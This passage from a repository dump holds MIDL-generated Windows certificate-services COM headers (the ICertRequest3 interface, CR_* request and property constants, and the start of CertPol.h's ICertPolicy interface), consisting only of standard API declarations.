            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertRequest3 * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Submit )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG Flags,
            /* [in] */ __RPC__in const BSTR strRequest,
            /* [in] */ __RPC__in const BSTR strAttributes,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *RetrievePending )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetLastStatus )( 
            __RPC__in ICertRequest3 * This,
            /* [retval][out] */ __RPC__out LONG *pStatus);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestId )( 
            __RPC__in ICertRequest3 * This,
            /* [retval][out] */ __RPC__out LONG *pRequestId);
        
        HRESULT ( STDMETHODCALLTYPE *GetDispositionMessage )( 
            __RPC__in ICertRequest3 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDispositionMessage);
        
        HRESULT ( STDMETHODCALLTYPE *GetCACertificate )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG fExchangeCertificate,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetCertificate )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrCertificate);
        
        HRESULT ( STDMETHODCALLTYPE *GetIssuedCertificate )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG RequestId,
            /* [in] */ __RPC__in const BSTR strSerialNumber,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetErrorMessageText )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG hrMessage,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrErrorMessageText);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAProperty )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAPropertyFlags )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__out LONG *pPropFlags);
        
        HRESULT ( STDMETHODCALLTYPE *GetCAPropertyDisplayName )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG PropId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDisplayName);
        
        HRESULT ( STDMETHODCALLTYPE *GetFullResponseProperty )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG PropId,
            /* [in] */ LONG PropIndex,
            /* [in] */ LONG PropType,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out VARIANT *pvarPropertyValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetCredential )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ LONG hWnd,
            /* [in] */ X509EnrollmentAuthFlags AuthType,
            /* [in] */ __RPC__in BSTR strCredential,
            /* [in] */ __RPC__in BSTR strPassword);
        
        HRESULT ( STDMETHODCALLTYPE *GetRequestIdString )( 
            __RPC__in ICertRequest3 * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrRequestId);
        
        HRESULT ( STDMETHODCALLTYPE *GetIssuedCertificate2 )( 
            __RPC__in ICertRequest3 * This,
            /* [in] */ __RPC__in BSTR strConfig,
            /* [in] */ __RPC__in BSTR strRequestId,
            /* [in] */ __RPC__in BSTR strSerialNumber,
            /* [retval][out] */ __RPC__out LONG *pDisposition);
        
        HRESULT ( STDMETHODCALLTYPE *GetRefreshPolicy )( 
            __RPC__in ICertRequest3 * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        END_INTERFACE
    } ICertRequest3Vtbl;

    interface ICertRequest3
    {
        CONST_VTBL struct ICertRequest3Vtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICertRequest3_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICertRequest3_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICertRequest3_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICertRequest3_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICertRequest3_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICertRequest3_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICertRequest3_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICertRequest3_Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> Submit(This,Flags,strRequest,strAttributes,strConfig,pDisposition) ) 

#define ICertRequest3_RetrievePending(This,RequestId,strConfig,pDisposition)	\
    ( (This)->lpVtbl -> RetrievePending(This,RequestId,strConfig,pDisposition) ) 

#define ICertRequest3_GetLastStatus(This,pStatus)	\
    ( (This)->lpVtbl -> GetLastStatus(This,pStatus) ) 

#define ICertRequest3_GetRequestId(This,pRequestId)	\
    ( (This)->lpVtbl -> GetRequestId(This,pRequestId) ) 

#define ICertRequest3_GetDispositionMessage(This,pstrDispositionMessage)	\
    ( (This)->lpVtbl -> GetDispositionMessage(This,pstrDispositionMessage) ) 

#define ICertRequest3_GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCACertificate(This,fExchangeCertificate,strConfig,Flags,pstrCertificate) ) 

#define ICertRequest3_GetCertificate(This,Flags,pstrCertificate)	\
    ( (This)->lpVtbl -> GetCertificate(This,Flags,pstrCertificate) ) 


#define ICertRequest3_GetIssuedCertificate(This,strConfig,RequestId,strSerialNumber,pDisposition)	\
    ( (This)->lpVtbl -> GetIssuedCertificate(This,strConfig,RequestId,strSerialNumber,pDisposition) ) 

#define ICertRequest3_GetErrorMessageText(This,hrMessage,Flags,pstrErrorMessageText)	\
    ( (This)->lpVtbl -> GetErrorMessageText(This,hrMessage,Flags,pstrErrorMessageText) ) 

#define ICertRequest3_GetCAProperty(This,strConfig,PropId,PropIndex,PropType,Flags,pvarPropertyValue)	\
    ( (This)->lpVtbl -> GetCAProperty(This,strConfig,PropId,PropIndex,PropType,Flags,pvarPropertyValue) ) 

#define ICertRequest3_GetCAPropertyFlags(This,strConfig,PropId,pPropFlags)	\
    ( (This)->lpVtbl -> GetCAPropertyFlags(This,strConfig,PropId,pPropFlags) ) 

#define ICertRequest3_GetCAPropertyDisplayName(This,strConfig,PropId,pstrDisplayName)	\
    ( (This)->lpVtbl -> GetCAPropertyDisplayName(This,strConfig,PropId,pstrDisplayName) ) 

#define ICertRequest3_GetFullResponseProperty(This,PropId,PropIndex,PropType,Flags,pvarPropertyValue)	\
    ( (This)->lpVtbl -> GetFullResponseProperty(This,PropId,PropIndex,PropType,Flags,pvarPropertyValue) ) 


#define ICertRequest3_SetCredential(This,hWnd,AuthType,strCredential,strPassword)	\
    ( (This)->lpVtbl -> SetCredential(This,hWnd,AuthType,strCredential,strPassword) ) 

#define ICertRequest3_GetRequestIdString(This,pstrRequestId)	\
    ( (This)->lpVtbl -> GetRequestIdString(This,pstrRequestId) ) 

#define ICertRequest3_GetIssuedCertificate2(This,strConfig,strRequestId,strSerialNumber,pDisposition)	\
    ( (This)->lpVtbl -> GetIssuedCertificate2(This,strConfig,strRequestId,strSerialNumber,pDisposition) ) 

#define ICertRequest3_GetRefreshPolicy(This,pValue)	\
    ( (This)->lpVtbl -> GetRefreshPolicy(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICertRequest3_INTERFACE_DEFINED__ */



#ifndef __CERTCLILib_LIBRARY_DEFINED__
#define __CERTCLILib_LIBRARY_DEFINED__

/* library CERTCLILib */
/* [helpstring][version][uuid] */ 

#define wszCONFIG_COMMONNAME 		L"CommonName"
#define wszCONFIG_ORGUNIT 		L"OrgUnit"
#define wszCONFIG_ORGANIZATION 		L"Organization"
#define wszCONFIG_LOCALITY 		L"Locality"
#define wszCONFIG_STATE			L"State"
#define wszCONFIG_COUNTRY		L"Country"
#define wszCONFIG_CONFIG		L"Config"
#define wszCONFIG_EXCHANGECERTIFICATE	L"ExchangeCertificate"
#define wszCONFIG_SIGNATURECERTIFICATE	L"SignatureCertificate"
#define wszCONFIG_DESCRIPTION		L"Description"
#define wszCONFIG_COMMENT		L"Comment" // obsolete: use Description
#define wszCONFIG_SERVER 		L"Server"
#define wszCONFIG_AUTHORITY 		L"Authority"
#define wszCONFIG_SANITIZEDNAME		L"SanitizedName"
#define wszCONFIG_SHORTNAME		L"ShortName"
#define wszCONFIG_SANITIZEDSHORTNAME	L"SanitizedShortName"
#define wszCONFIG_FLAGS			L"Flags"
#define wszCONFIG_WEBENROLLMENTSERVERS	L"WebEnrollmentServers"
#define	CAIF_DSENTRY	( 0x1 )

#define	CAIF_SHAREDFOLDERENTRY	( 0x2 )

#define	CAIF_REGISTRY	( 0x4 )

#define	CAIF_LOCAL	( 0x8 )

#define	CAIF_REGISTRYPARENT	( 0x10 )

#define	CR_IN_BASE64HEADER	( 0 )

#define	CR_IN_BASE64	( 0x1 )

#define	CR_IN_BINARY	( 0x2 )

#define	CR_IN_ENCODEANY	( 0xff )

#define	CR_IN_ENCODEMASK	( 0xff )

#define	CR_IN_FORMATANY	( 0 )

#define	CR_IN_PKCS10	( 0x100 )

#define	CR_IN_KEYGEN	( 0x200 )

#define	CR_IN_PKCS7	( 0x300 )

#define	CR_IN_CMC	( 0x400 )

#define	CR_IN_CHALLENGERESPONSE	( 0x500 )

#define	CR_IN_FORMATMASK	( 0xff00 )

#define	CR_IN_SCEP	( 0x10000 )

#define	CR_IN_RPC	( 0x20000 )

#define	CR_IN_HTTP	( 0x30000 )

#define	CR_IN_FULLRESPONSE	( 0x40000 )

#define	CR_IN_CRLS	( 0x80000 )

#define	CR_IN_MACHINE	( 0x100000 )

#define	CR_IN_ROBO	( 0x200000 )

#define	CR_IN_CLIENTIDNONE	( 0x400000 )

#define	CR_IN_CONNECTONLY	( 0x800000 )

#define	CR_IN_RETURNCHALLENGE	( 0x1000000 )

#define	CR_IN_SCEPPOST	( 0x2000000 )

#define	CR_IN_CLIENTFLAGSMASK	( ( ( ( ( ( CR_IN_ENCODEMASK | CR_IN_RPC )  | CR_IN_MACHINE )  | CR_IN_CLIENTIDNONE )  | CR_IN_CONNECTONLY )  | CR_IN_RETURNCHALLENGE )  )

#define	CC_DEFAULTCONFIG	( 0 )

#define	CC_UIPICKCONFIG	( 0x1 )

#define	CC_FIRSTCONFIG	( 0x2 )

#define	CC_LOCALCONFIG	( 0x3 )

#define	CC_LOCALACTIVECONFIG	( 0x4 )

#define	CC_UIPICKCONFIGSKIPLOCALCA	( 0x5 )

#define	CR_DISP_INCOMPLETE	( 0 )

#define	CR_DISP_ERROR	( 0x1 )

#define	CR_DISP_DENIED	( 0x2 )

#define	CR_DISP_ISSUED	( 0x3 )

#define	CR_DISP_ISSUED_OUT_OF_BAND	( 0x4 )

#define	CR_DISP_UNDER_SUBMISSION	( 0x5 )

#define	CR_DISP_REVOKED	( 0x6 )

#define	CR_OUT_BASE64HEADER	( 0 )

#define	CR_OUT_BASE64	( 0x1 )

#define	CR_OUT_BINARY	( 0x2 )

#define	CR_OUT_BASE64REQUESTHEADER	( 0x3 )

#define	CR_OUT_HEX	( 0x4 )

#define	CR_OUT_HEXASCII	( 0x5 )

#define	CR_OUT_BASE64X509CRLHEADER	( 0x9 )

#define	CR_OUT_HEXADDR	( 0xa )

#define	CR_OUT_HEXASCIIADDR	( 0xb )

#define	CR_OUT_HEXRAW	( 0xc )

#define	CR_OUT_ENCODEMASK	( 0xff )

#define	CR_OUT_CHAIN	( 0x100 )

#define	CR_OUT_CRLS	( 0x200 )

#define	CR_OUT_NOCRLF	( 0x40000000 )

#define	CR_OUT_NOCR	( 0x80000000 )

#define	CR_GEMT_DEFAULT	( 0 )

#define	CR_GEMT_HRESULT_STRING	( 0x1 )

#define	CR_GEMT_HTTP_ERROR	( 0x2 )

#define CR_PROP_NONE               0  // Invalid
#define CR_PROP_FILEVERSION        1  // String
#define CR_PROP_PRODUCTVERSION     2  // String
#define CR_PROP_EXITCOUNT          3  // Long

// CR_PROP_EXITCOUNT Elements:
#define CR_PROP_EXITDESCRIPTION    4  // String, Indexed

#define CR_PROP_POLICYDESCRIPTION  5  // String
#define CR_PROP_CANAME             6  // String
#define CR_PROP_SANITIZEDCANAME    7  // String
#define CR_PROP_SHAREDFOLDER       8  // String
#define CR_PROP_PARENTCA           9  // String
#define CR_PROP_CATYPE            10  // Long
#define CR_PROP_CASIGCERTCOUNT    11  // Long

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CASIGCERT         12  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CASIGCERTCHAIN    13  // Binary, Indexed

#define CR_PROP_CAXCHGCERTCOUNT   14  // Long

// CR_PROP_CAXCHGCERTCOUNT Elements:
#define CR_PROP_CAXCHGCERT        15  // Binary, Indexed

// CR_PROP_CAXCHGCERTCOUNT Elements:
#define CR_PROP_CAXCHGCERTCHAIN   16  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
// Fetch only if CR_PROP_CRLSTATE[i] == CA_DISP_VALID
// May also be available if CR_PROP_CRLSTATE[i] == CA_DISP_INVALID
#define CR_PROP_BASECRL           17  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
// Fetch only if Delta CRLs enabled && CR_PROP_CRLSTATE[i] == CA_DISP_VALID
// May also be available if CR_PROP_CRLSTATE[i] == CA_DISP_INVALID
#define CR_PROP_DELTACRL          18  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CACERTSTATE       19  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CRLSTATE          20  // Long, Indexed

#define CR_PROP_CAPROPIDMAX       21  // Long
#define CR_PROP_DNSNAME           22  // String
#define CR_PROP_ROLESEPARATIONENABLED 23 // Long
#define CR_PROP_KRACERTUSEDCOUNT  24  // Long
#define CR_PROP_KRACERTCOUNT      25  // Long

// CR_PROP_KRACERTCOUNT Elements:
#define CR_PROP_KRACERT           26  // Binary, Indexed

// CR_PROP_KRACERTCOUNT Elements:
#define CR_PROP_KRACERTSTATE      27  // Long, Indexed

#define CR_PROP_ADVANCEDSERVER    28  // Long
#define CR_PROP_TEMPLATES         29  // String

// CR_PROP_CASIGCERTCOUNT Elements:
// Fetch only if CR_PROP_CRLSTATE[i] == CA_DISP_VALID
#define CR_PROP_BASECRLPUBLISHSTATUS 30  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
// Fetch only if Delta CRLs enabled && CR_PROP_CRLSTATE[i] == CA_DISP_VALID
#define CR_PROP_DELTACRLPUBLISHSTATUS 31  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CASIGCERTCRLCHAIN 32  // Binary, Indexed

// CR_PROP_CAXCHGCERTCOUNT Elements:
#define CR_PROP_CAXCHGCERTCRLCHAIN 33 // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CACERTSTATUSCODE  34  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CAFORWARDCROSSCERT 35  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CABACKWARDCROSSCERT 36  // Binary, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CAFORWARDCROSSCERTSTATE 37  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CABACKWARDCROSSCERTSTATE 38  // Long, Indexed

// CR_PROP_CASIGCERTCOUNT Elements:
#define CR_PROP_CACERTVERSION       39  // Long, Indexed
#define CR_PROP_SANITIZEDCASHORTNAME 40  // String

// CR_PROP_CERTCDPURLS Elements:
#define CR_PROP_CERTCDPURLS 41  // String, Indexed

// CR_PROP_CERTAIAURLS Elements:
#define CR_PROP_CERTAIAURLS 42  // String, Indexed

// CR_PROP_CERTAIAOCSPURLS Elements:
#define CR_PROP_CERTAIAOCSPURLS 43  // String, Indexed

// CR_PROP_LOCALENAME Elements:
#define CR_PROP_LOCALENAME 44  // String

// CR_PROP_SUBJECTTEMPLATE_OIDS Elements:
#define CR_PROP_SUBJECTTEMPLATE_OIDS 45  // String
#define CR_PROP_SCEPSERVERCERTS        1000  // Binary
#define CR_PROP_SCEPSERVERCAPABILITIES 1001  // String
#define CR_PROP_SCEPSERVERCERTSCHAIN   1002  // Binary
#define CR_PROP_SCEPMIN CR_PROP_SCEPSERVERCERTS
#define CR_PROP_SCEPMAX CR_PROP_SCEPSERVERCERTSCHAIN


#define FR_PROP_NONE                    0  // Invalid
#define FR_PROP_FULLRESPONSE            1  // Binary
#define FR_PROP_STATUSINFOCOUNT         2  // Long

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_BODYPARTSTRING          3  // String, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_STATUS                  4  // Long, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_STATUSSTRING            5  // String, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_OTHERINFOCHOICE         6  // Long, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_FAILINFO                7  // Long, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_PENDINFOTOKEN           8  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_PENDINFOTIME            9  // Date, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ISSUEDCERTIFICATEHASH  10  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ISSUEDCERTIFICATE      11  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ISSUEDCERTIFICATECHAIN 12  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ISSUEDCERTIFICATECRLCHAIN 13  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ENCRYPTEDKEYHASH	  14  // Binary, Indexed

#define FR_PROP_FULLRESPONSENOPKCS7	  15  // Binary

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_CAEXCHANGECERTIFICATEHASH	  16  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_CAEXCHANGECERTIFICATE	  17  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_CAEXCHANGECERTIFICATECHAIN	  18  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_CAEXCHANGECERTIFICATECRLCHAIN  19  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ATTESTATIONCHALLENGE		  20  // Binary, Indexed

// FR_PROP_STATUSINFOCOUNT Elements:
#define FR_PROP_ATTESTATIONPROVIDERNAME	  21  // Binary, Indexed

// FR_PROP_CLAIMCHALLENGE:
#define FR_PROP_CLAIMCHALLENGE		  22  // Long

EXTERN_C const IID LIBID_CERTCLILib;

EXTERN_C const CLSID CLSID_CCertGetConfig;

#ifdef __cplusplus

class DECLSPEC_UUID("c6cc49b0-ce17-11d0-8833-00a0c903b83c")
CCertGetConfig;
#endif

EXTERN_C const CLSID CLSID_CCertConfig;

#ifdef __cplusplus

class DECLSPEC_UUID("372fce38-4324-11d0-8810-00a0c903b83c")
CCertConfig;
#endif

EXTERN_C const CLSID CLSID_CCertRequest;

#ifdef __cplusplus

class DECLSPEC_UUID("98aff3f0-5524-11d0-8812-00a0c903b83c")
CCertRequest;
#endif

EXTERN_C const CLSID CLSID_CCertServerPolicy;

#ifdef __cplusplus

class DECLSPEC_UUID("aa000926-ffbe-11cf-8800-00a0c903b83c")
CCertServerPolicy;
#endif

EXTERN_C const CLSID CLSID_CCertServerExit;

#ifdef __cplusplus

class DECLSPEC_UUID("4c4a5e40-732c-11d0-8816-00a0c903b83c")
CCertServerExit;
#endif
#endif /* __CERTCLILib_LIBRARY_DEFINED__ */

/* interface __MIDL_itf_certcli_0000_0007 */
/* [local] */ 

#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
#pragma endregion


extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0007_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certcli_0000_0007_v0_0_s_ifspec;

/* Additional Prototypes for ALL interfaces */

unsigned long             __RPC_USER  BSTR_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  VARIANT_UserSize(     __RPC__in unsigned long *, unsigned long            , __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserMarshal(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserUnmarshal(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out VARIANT * ); 
void                      __RPC_USER  VARIANT_UserFree(     __RPC__in unsigned long *, __RPC__in VARIANT * ); 

unsigned long             __RPC_USER  BSTR_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in BSTR * ); 
unsigned char * __RPC_USER  BSTR_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out BSTR * ); 
void                      __RPC_USER  BSTR_UserFree64(     __RPC__in unsigned long *, __RPC__in BSTR * ); 

unsigned long             __RPC_USER  VARIANT_UserSize64(     __RPC__in unsigned long *, unsigned long            , __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserMarshal64(  __RPC__in unsigned long *, __RPC__inout_xcount(0) unsigned char *, __RPC__in VARIANT * ); 
unsigned char * __RPC_USER  VARIANT_UserUnmarshal64(__RPC__in unsigned long *, __RPC__in_xcount(0) unsigned char *, __RPC__out VARIANT * ); 
void                      __RPC_USER  VARIANT_UserFree64(     __RPC__in unsigned long *, __RPC__in VARIANT * ); 

/* end of Additional Prototypes */

#ifdef __cplusplus
}
#endif

#endif




================================================
FILE: AD-BOF/ADCS-BOF/src/request/CertPol.h
================================================


/* this ALWAYS GENERATED file contains the definitions for the interfaces */


 /* File created by MIDL compiler version 8.01.0622 */
/* @@MIDL_FILE_HEADING(  ) */



/* verify that the <rpcndr.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCNDR_H_VERSION__
#define __REQUIRED_RPCNDR_H_VERSION__ 500
#endif

/* verify that the <rpcsal.h> version is high enough to compile this file*/
#ifndef __REQUIRED_RPCSAL_H_VERSION__
#define __REQUIRED_RPCSAL_H_VERSION__ 100
#endif

#include "rpc.h"
#include "rpcndr.h"

#ifndef __RPCNDR_H_VERSION__
#error this stub requires an updated version of <rpcndr.h>
#endif /* __RPCNDR_H_VERSION__ */

#ifndef COM_NO_WINDOWS_H
#include "windows.h"
#include "ole2.h"
#endif /*COM_NO_WINDOWS_H*/

#ifndef __certpol_h__
#define __certpol_h__

#if defined(_MSC_VER) && (_MSC_VER >= 1020)
#pragma once
#endif

/* Forward Declarations */ 

#ifndef __ICertPolicy_FWD_DEFINED__
#define __ICertPolicy_FWD_DEFINED__
typedef interface ICertPolicy ICertPolicy;

#endif 	/* __ICertPolicy_FWD_DEFINED__ */


#ifndef __ICertPolicy2_FWD_DEFINED__
#define __ICertPolicy2_FWD_DEFINED__
typedef interface ICertPolicy2 ICertPolicy2;

#endif 	/* __ICertPolicy2_FWD_DEFINED__ */


#ifndef __INDESPolicy_FWD_DEFINED__
#define __INDESPolicy_FWD_DEFINED__
typedef interface INDESPolicy INDESPolicy;

#endif 	/* __INDESPolicy_FWD_DEFINED__ */


/* header files for imported files */
#include "wtypes.h"
#include "certmod.h"
#include "certbase.h"
#include "certbcli.h"

#ifdef __cplusplus
extern "C"{
#endif 


/* interface __MIDL_itf_certpol_0000_0000 */
/* [local] */ 

#include <winapifamily.h>
#pragma region Desktop Family
#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)


extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0000_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certpol_0000_0000_v0_0_s_ifspec;

#ifndef __ICertPolicy_INTERFACE_DEFINED__
#define __ICertPolicy_INTERFACE_DEFINED__

/* interface ICertPolicy */
/* [unique][helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICertPolicy;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("38bb5a00-7636-11d0-b413-00a0c91bbf8c")
    ICertPolicy : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in const BSTR strConfig) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE VerifyRequest( 
            /* [in] */ __RPC__in const BSTR strConfig,
            /* [in] */ LONG Context,
            /* [in] */ LONG bNewRequest,
            /* [in] */ LONG Flags,
            /* [retval][out] */ __RPC__out LONG *pDisposition) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetDescription( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrDescription) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ShutDown( void) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICertPolicyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICertPolicy * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICertPolicy * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICertPolicy * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICertPolicy * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICertPolicy * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICertPolicy * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICertPolicy * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
